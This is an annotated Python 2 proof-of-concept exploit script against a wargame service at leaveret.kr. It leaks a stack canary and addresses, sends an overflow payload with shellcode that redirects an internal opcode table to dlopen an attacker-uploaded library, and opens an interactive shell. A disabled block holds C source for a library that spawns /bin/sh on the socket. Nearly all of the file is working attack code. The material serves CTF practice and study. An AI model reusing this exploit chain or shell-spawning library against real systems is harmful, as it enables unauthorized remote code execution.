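"""Proof-of-concept exploit script against one wargame service (HOST/PORT below).

Python 2 script (print statements, str/bytearray mixing).  It opens two
connections.  On the first it waits for a prompt containing "choice", sends a
single byte and reads up to 1024 bytes back, then takes three 4-byte values
from that reply at fixed offsets (the author labels them canary, stack and
pc; what the reply really holds is inferred from those names, not shown here).
On the second connection it sends a 4096-byte payload derived from those
values and hands the socket to telnetlib for an interactive session.

The payload names a library that, per the author's comment, was already
placed under /tmp on the target by other means.  `your_uploaded_library` is
left undefined on purpose, so the script raises NameError until that name is
assigned.  All address constants (0x80ee344, 0x80edf40, 0x80b6e50 and the
offsets 0x10ce / 0x1000) come verbatim from the original and appear to be
specific to the challenge binary.
"""
import socket
import struct
import os
import random  # unused in this script; kept because the original imports it
import telnetlib


def p(x):
    """Pack *x* as a 32-bit little-endian value.

    The mask makes negative inputs (the script uses -1) pack as 0xffffffff
    instead of raising struct.error.
    """
    return struct.pack("<L", x & 0xffffffff)


def up(x):
    """Unpack a 4-byte little-endian unsigned value (struct.error otherwise)."""
    return struct.unpack("<L", x)[0]


#HOST = '0.0.0.0'
#PORT = 9797
HOST = 'leaveret.kr'
PORT = 9001

t = telnetlib.Telnet()

# --- connection 1: read the values the payload is built from ---------------
s = socket.create_connection((HOST, PORT))
d = ''
while 'choice' not in d:
    c = s.recv(10240)
    print c
    d += c

s.send('A')
data = s.recv(1024)
# The slices below need 0x108 bytes.  A short read would otherwise surface as
# an obscure struct.error inside up(); fail with a clear message instead.
if len(data) < 0x108:
    raise RuntimeError("short reply (%d bytes), expected at least 0x108" % len(data))
canary = data[0x100 - 8:][:4]
stack = data[0x100:][:4]
pc = data[0x104:][:4]
print repr(canary), repr(stack)
print repr(data)
# The original left this socket open and simply rebound `s` below.
s.close()

pc = up(pc)
stack = up(stack)

# --- connection 2: deliver the payload -------------------------------------
s = socket.create_connection((HOST, PORT))
d = ''
while 'choice' not in d:
    c = s.recv(10240)
    print c
    d += c

# Both constants are fixed offsets relative to the leaked values.
mmap_base = pc - 0x10ce
new_pc = mmap_base + stack - 0x1000
print hex(new_pc)
# stage0: filler up to the 4 leaked bytes, two 4-byte fillers, then new_pc.
stage0 = "A" * (0x100 - 8)
stage0 += canary
stage0 += "A" * 4
stage0 += "A" * 4
stage0 += p(new_pc)

# Disabled by the author: a bare string literal, so nothing below runs.  It
# documents how the library referenced further down was built.
'''
#########################################################
# if you want to exclude compile procedure
# please compile your own library manually
# static compile is preferred
#########################################################
source = """
int init() {
    unsigned int **RegTable =*(unsigned int *)0x80ee344;
    char buf[2560];
    sprintf(buf, "/bin/sh <&%d >&%d", RegTable[7], RegTable[7]);
    system(buf);
}
"""

lib_file = open('_my_lib.c', 'wb')
lib_file.write(source)
lib_file.close()

os.system('gcc _my_lib.c -o _my_lib -m32 --shared -static -Wl,-init,init')
lib_compiled = open('_my_lib', 'rb')
lib_data = lib_compiled.read()
lib_compiled.close()
'''

# /tmp/tmp/mylib is my library which was compiled with source above
# `your_uploaded_library` is intentionally undefined here (NameError until
# assigned): it is the file name of the library already placed under /tmp.
path = '/tmp/' + your_uploaded_library + '\x00'  # through another prob's shell
stage1 = "A" * (15 - 7) + path
# mov opTable[15], offset dlopen_doit (and skip padding)
shellcode = bytearray([0, 0b00100100]) + chr(8 + len(stage1)) + p((0x80edf40 + 15 * 4) - mmap_base) + p(0x80b6e50)
# padding + library path
shellcode += stage1
# and calls dlopen_doit
shellcode += bytearray([15]) + p(new_pc + 4)[1:] + p(1) + p(-1) + p(0x41414141)
stage0 += shellcode
# NUL-padded to the 4096 bytes the service is expected to read.
s.send(stage0.ljust(4096, "\x00"))
s.recv(1024)  # receive some data
t.sock = s
t.interact()  # shell!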